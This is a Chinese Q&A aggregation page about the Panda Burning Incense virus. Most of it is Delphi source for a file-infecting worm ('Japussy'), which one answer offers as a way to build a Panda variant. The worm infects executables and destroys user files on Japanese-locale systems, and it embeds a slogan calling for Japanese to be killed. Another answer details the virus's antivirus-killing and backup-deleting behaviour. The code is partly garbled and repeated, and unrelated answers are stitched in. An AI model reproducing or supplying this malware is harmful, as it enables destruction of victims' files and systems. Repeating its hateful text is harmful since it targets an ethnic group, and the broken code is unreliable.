當前位置:首頁 » 編程語言 » 熊貓代碼c語言
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

熊貓代碼c語言

發布時間: 2022-05-22 18:19:13

❶ 關於熊貓燒香的代碼

不會。熊貓燒香最後需要編譯環境打包成可執行的exe文件,bat只是一個批處理文件,本省不具有執行功能。

❷ 李俊寫熊貓燒香用了哪些編程語言

熊貓燒香的初代源代碼是delphi編寫的。

❸ 熊貓燒香病毒源代碼用c語言寫出來!謝謝了!

一個簡單有效的方法:
新建名Documents的文件夾,在C盤復制一個EXE文件放到Documents文件夾下,然後把新健文件夾覆蓋到C:\Documents
and
Settings\All
Users目錄下就可以了
正常模式下不行就到安全模式里去。
我就這樣解決的。

❹ 熊貓是燒香是用C語言編的

用delphi,其實沒什麼難得,只要熟悉了他的語法和函數,任何人都能編寫。

PS:編寫病毒其實就是編寫一個程序,沒什麼難度,只不過有高有低,這就要看個人的悟性了,跟使用的程序沒什麼太大分別,像VB/VC/ASM/MSAM/.NET/C++,甚至VF和WORD/EXCEL都可以,更簡單的不需要任何工具,單獨使用批處理命令或者記事本就可以。

編寫危害程度越高的病毒,對作者而言,要求的技術層次和范圍越高,像對硬體底層(甚至到晶元級的)、網路底層、協議、軟體底層等等,范圍十分廣闊。

個人而言,這次爆發的熊貓病毒的危害程度而言遠遠沒有當年的CIH病毒來的恐怖、影響的范圍大、造成的損失大,就病毒個體而言,也沒有CIH編寫的巧妙。把他們兩者相比有點關公戰秦瓊的感覺,但就兩個病毒的作者水平而言CIH高於熊貓。

PS2:CIH病毒,用ASM編寫(匯編語言),損壞主板BIOS數據,1999年在世界范圍內爆發,由於當時的技術所限,基本上中了,主板就可以扔了(當年的城裡兄弟,還記得開機熱插拔CMOS晶元嗎?反正當時我是6塊,成功率0,失敗率100%,還有那些用讀寫器刷CMOS的JS,掙了多少啊),可以想想損失有多大!「其實分析其源代碼,這個病毒編寫並不怎麼復雜,只不過陳盈豪的「悟性」比較高而已」——這是我當年學習的時候,我們班對班主任的回答,這大概也是「天才」與普通人的分別啊。

❺ 求完美國際胖SS(熊貓)的代碼,還有是先建立人物再弄代碼還是先弄代碼再建立人物,流程是什麼樣的

先改代碼、 完美世界》國際版\element\userdata\character文件夾下的ini文件就可以達到character71.ini 女羽靈的形象修改默認配置character70.ini 男羽靈character00.ini 男武俠character10.ini 男法師character01.ini 女武俠character11.ini 女法師character61.ini 女羽芒character60.ini 男羽芒character40.ini 妖獸character41.ini 妖精單數是美女,雙數是帥哥。以SS為例,找到:character40.ini文件,打開文件,找到最下面的[Body],這里是你的身體參數,注意:最大255其他參數最好不要動,那幾個跟身體相關的參數,改成255就可以[Body]bodyID (身體的類型)= 0是老虎,1是獅子,2是狼,3是熊貓headScale (頭)= 255upScale (上身)= 255waistScale (下身)= 255armWidth (胳膊)= 255legWidth (大腿)= 255breastScale (胸)= 255更改這幾個就可以了這里給大家一個小技巧:看到[Hair]這個參數這個是你的發型,如果你想讓你的SS變成蛐蛐(帶個WX的犄角)你可以把WX的頭部參數拷到這里,方法么?還是用上次的存檔方法咯HOHO,存完了找[Hair]參數,把裡面的兩個數值完全復制過來就可以了,身高你吧upScale waistScale 這2項改成10 就變的胖胖的了。改成250 就變成高高的了idHairModel = 0把這個0改成776就可以了改774是猴子775是娃娃771是小豬頭772是小猴子773是小娃娃

❻ 誰有 熊貓燒香 C語言版 源代碼謝謝

這都過時了,現在除非人家是xp及以下的系統並且是裸機,不然是不可能中這毒的,所以說裡面的代碼也沒有研究價值了

❼ 熊貓燒香是用什麼語言編的(c語言vb還是其他)

熊貓燒香」,這是一個感染型的蠕蟲病毒,它能感染系統中exe,com,pif,src,html,asp等文件,它還能中止大量的反病毒軟體進程並且會刪除擴展名為gho的文件,該文件是一系統備份工具GHOST的備份文件,使用戶的系統備份文件丟失。被感染的用戶系統中所有.exe可執行文件全部被改成熊貓舉著三根香的模樣。

1:拷貝文件

病毒運行後,會把自己拷貝到C:\WINDOWS\System32\Drivers\spoclsv.exe

2:添加註冊表自啟動

病毒會添加自啟動項HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

3:病毒行為

a:每隔1秒尋找桌面窗口,並關閉窗口標題中含有以下字元的程序:

QQKav、QQAV、防火牆、進程、VirusScan、網鏢、殺毒、毒霸、瑞星、江民、黃山IE、超級兔子、優化大師、木馬剋星、木馬清道夫、QQ病毒、注冊表編輯器、系統配置實用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、綠鷹PC、密碼防盜、噬菌體、木馬輔助查找器、System Safety Monitor、Wrapped gift Killer、Winsock Expert、游戲木馬檢測大師、msctls_statusbar32、pjf(ustc)、IceSword

並使用的鍵盤映射的方法關閉安全軟體IceSword

添加註冊表使自己自啟動 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare -> C:\WINDOWS\System32\Drivers\spoclsv.exe

並中止系統中以下的進程:

Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe

b:每隔18秒點擊病毒作者指定的網頁,並用命令行檢查系統中是否存在共享,共存在的話就運行net share命令關閉admin$共享

c:每隔10秒下載病毒作者指定的文件,並用命令行檢查系統中是否存在共享,共存在的話就運行net share命令關閉admin$共享

d:每隔6秒刪除安全軟體在注冊表中的鍵值

並修改以下值不顯示隱藏文件 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue -> 0x00

刪除以下服務:

navapsvc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc

e:感染文件

病毒會感染擴展名為exe,pif,com,src的文件,把自己附加到文件的頭部,並在擴展名為htm,html, asp,php,jsp,aspx的文件中添加一網址,用戶一但打開了該文件,IE就會不斷的在後台點擊寫入的網址,達到增加點擊量的目的,但病毒不會感染以下文件夾名中的文件:

WINDOW、Winnt、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、Common Files、ComPlus Applications、Messenger、InstallShield Installation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone

g:刪除文件

病毒會刪除擴展名為gho的文件,該文件是一系統備份工具GHOST的備份文件使用戶的系統備份文件丟失。

❽ 熊貓是燒香是用C語言編的下載哪裡有

不是用C語言寫的,是用Dephi5寫的,搜毒網上有源碼,你可以自己去下!!!

❾ 誰有 熊貓燒香 源代碼【要c語言的,謝謝啊。

end;
end;
{ 主程序開始 }
begin
if iswin9x then //是win9x
registerserviceprocess(getcurrentprocessid, 1) //注冊為服務進程
else //winnt
begin
//遠程線程映射到explorer進程
//哪位兄台願意完成之?
end;
//如果是原始病毒體自己
if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //感染和發郵件
else //已寄生於宿主程序上了,開始工作
begin
tmpfile := paramstr(0); //創建臨時文件
delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一個空格
extractfile(tmpfile); //分離之
fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi); //創建新進程運行之
infectfiles; //感染和發郵件
end;
end.
把我說的..空格刪去,,然後保存到C盤任何路徑下..你大概就能得熊貓燒香變種headersize = 82432; //病毒體的大小
iconoffset = $12eb8; //pe文件主圖標的偏移量

//在我的delphi5 sp1上面編譯得到的大小,其它版本的delphi可能不同
//查找2800000020的十六進制字元串可以找到主圖標的偏移量

{
headersize = 38912; //upx壓縮過病毒體的大小
iconoffset = $92bc; //upx壓縮過pe文件主圖標的偏移量

//upx 1.24w 用法: upx -9 --8086 japussy.exe
}
iconsize = $2e8; //pe文件主圖標的大小--744位元組
icontail = iconoffset + iconsize; //pe文件主圖標的尾部
id = $44444444; //感染標記

//垃圾碼,以備寫入
catchword = 'if a race need to be killed out, it must be yamato. ' +
'if a country need to be destroyed, it must be japan! ' +
'*** w32.japussy.worm.a ***';
{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer;
stdcall; external 'kernel32.dll'; //函數聲明
var
tmpfile: string;
si: startupinfo;
pi: process_information;
isjap: boolean = false; //日文操作系統標記
{ 判斷是否為win9x }
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
ver.dwosversioninfosize := sizeof(tosversioninfo);
if not getversionex(ver) then
exit;
if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
result := true;
end;
{ 在流之間復制 }
procere stream(src: tstream; sstartpos: integer; dst: tstream;
dstartpos: integer; count: integer);
var
scurpos, dcurpos: integer;
begin
scurpos := src.position;
dcurpos := dst.position;
src.seek(sstartpos, 0);
dst.seek(dstartpos, 0);
dst.from(src, count);
src.seek(scurpos, 0);
dst.seek(dcurpos, 0);
end;
{ 將宿主文件從已感染的pe文件中分離出來,以備使用 }
procere extractfile(filename: string);
var
sstream, dstream: tfilestream;
begin
try
sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
dstream := tfilestream.create(filename, fmcreate);
try
sstream.seek(headersize, 0); //跳過頭部的病毒部分
dstream.from(sstream, sstream.size - headersize);
finally
dstream.free;
end;
finally
sstream.free;
end;
except
end;
end;
{ 填充startupinfo結構 }
procere fillstartupinfo(var si: startupinfo; state: word);
begin
si.cb := sizeof(si);
si.lpreserved := nil;
si.lpdesktop := nil;
si.lptitle := nil;
si.dwflags := startf_useshowwindow;
si.wshowwindow := state;
si.cbreserved2 := 0;
si.lpreserved2 := nil;
end;
{ 發帶毒郵件 }
procere sendmail;
begin
//哪位仁兄願意完成之?
end;
{ 感染pe文件 }
procere infectonefile(filename: string);
var
hdrstream, srcstream: tfilestream;
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出錯則文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己則不感染
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //檢查pe文件頭
begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe標記
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.seek(-4, sofromend); //檢查感染標記
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染過了或不是pe文件則退出
exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
//得到被感染文件的主圖標(744位元組),存入流
aicon.releasehandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
//頭文件
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
//寫入病毒體主圖標之前的數據
stream(hdrstream, 0, dststream, 0, iconoffset);
//寫入目前程序的主圖標
stream(icostream, 22, dststream, iconoffset, iconsize);
//寫入病毒體主圖標到病毒體尾部之間的數據
stream(hdrstream, icontail, dststream, icontail, headersize - icontail);
//寫入宿主程序
stream(srcstream, 0, dststream, headersize, srcstream.size);
//寫入已感染的標記
dststream.seek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); //替換宿主文件
dststream.free;
end;
except;
end;
end;
{ 將目標文件寫入垃圾碼後刪除 }
procere smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
setfileattributes(pchar(filename), 0); //去掉只讀屬性
filehandle := fileopen(filename, fmopenwrite); //打開文件
try
size := getfilesize(filehandle, nil); //文件大小
i := 0;
randomize;
max := random(15); //寫入垃圾碼的隨機次數
if max < 5 then
max := 5;
mass := size div max; //每個間隔塊的大小
len := length(catchword);
while i < max do
begin
fileseek(filehandle, i * mass, 0); //定位
//寫入垃圾碼,將文件徹底破壞掉
filewrite(filehandle, catchword, len);
inc(i);
end;
finally
fileclose(filehandle); //關閉文件
end;
deletefile(pchar(filename)); //刪除之
except
end;
end;
{ 獲得可寫的驅動器列表 }
function getdrives: string;
var
disktype: word;
d: char;
str: string;
i: integer;
begin
for i := 0 to 25 do //遍歷26個字母
begin
d := chr(i + 65);
str := d + ':\';
disktype := getdrivetype(pchar(str));
//得到本地磁碟和網路盤
if (disktype = drive_fixed) or (disktype = drive_remote) then
result := result + d;
end;
end;
{ 遍歷目錄,感染和摧毀文件 }
procere loopfiles(path, mask: string);
var
i, count: integer;
fn, ext: string;
subdir: tstrings;
searchrec: tsearchrec;
msg: tmsg;
function isvaliddir(searchrec: tsearchrec): integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 0 //不是目錄
else if (searchrec.attr = 16) and (searchrec.name <> '.') and
(searchrec.name <> '..') then
result := 1 //不是根目錄
else result := 2; //是根目錄
end;
begin
if (findfirst(path + mask, faanyfile, searchrec) = 0) then
begin
repeat
peekmessage(msg, 0, 0, 0, pm_remove); //調整消息隊列,避免引起懷疑
if isvaliddir(searchrec) = 0 then
begin
fn := path + searchrec.name;
ext := uppercase(extractfileext(fn));
if (ext = '.exe') or (ext = '.scr') then
begin
infectonefile(fn); //感染可執行文件
end
else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
begin
//感染html和asp文件,將base64編碼後的病毒寫入
//感染瀏覽此網頁的所有用戶
//哪位大兄弟願意完成之?
end
else if ext = '.wab' then //outlook地址簿文件
begin
//獲取outlook郵件地址
end
else if ext = '.adc' then //foxmail地址自動完成文件
begin
//獲取foxmail郵件地址
end
else if ext = 'ind' then //foxmail地址簿文件
begin
//獲取foxmail郵件地址
end
else
begin
if isjap then //是倭文操作系統
begin
if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
smashfile(fn); //摧毀文件
end;
end;
end;
//感染或刪除一個文件後睡眠200毫秒,避免cpu佔用率過高引起懷疑
sleep(200);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
subdir := tstringlist.create;
if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
begin
repeat
if isvaliddir(searchrec) = 1 then
subdir.add(searchrec.name);
until (findnext(searchrec) <> 0);
end;
findclose(searchrec);
count := subdir.count - 1;
for i := 0 to count do
loopfiles(path + subdir.strings + '\', mask);
freeandnil(subdir);
end;
{ 遍歷磁碟上所有的文件 }
procere infectfiles;
var
driverlist: string;
i, len: integer;
begin
if getacp = 932 then //日文操作系統
isjap := true; //去死吧!
driverlist := getdrives; //得到可寫的磁碟列表
len := length(driverlist);
while true do //死循環
begin
for i := len downto 1 do //遍歷每個磁碟驅動器
loopfiles(driverlist + ':\', '*.*'); //感染之
sendmail; //發帶毒郵件
sleep(1000 * 60 * 5); //睡眠5分鍾
end;
end;
{ 主程序開始 }
begin
if iswin9x then //是win9x
registerserviceprocess(getcurrentprocessid, 1) //注冊為服務進程
else //winnt
begin
//遠程線程映射到explorer進程
//哪位兄台願意完成之?
end;
//如果是原始病毒體自己
if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
infectfiles //感染和發郵件
else //已寄生於宿主程序上了,開始工作
begin
tmpfile := paramstr(0); //創建臨時文件
delete(tmpfile, length(tmpfile) - 4, 4);
tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一個空格
extractfile(tmpfile); //分離之
fillstartupinfo(si, sw_showdefault);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
0, nil, '.', si, pi); //創建新進程運行之
infectfiles; //感染和發郵件
end;
end.
把我說的..空格刪去,,然後保存到C盤任何路徑下..你大概就能得熊貓燒香變種

❿ C語言初練習為什麼下面代碼編譯後沒有運行

代碼中稍微有點問題,第一個scanf中寫成了#,應改為百分號%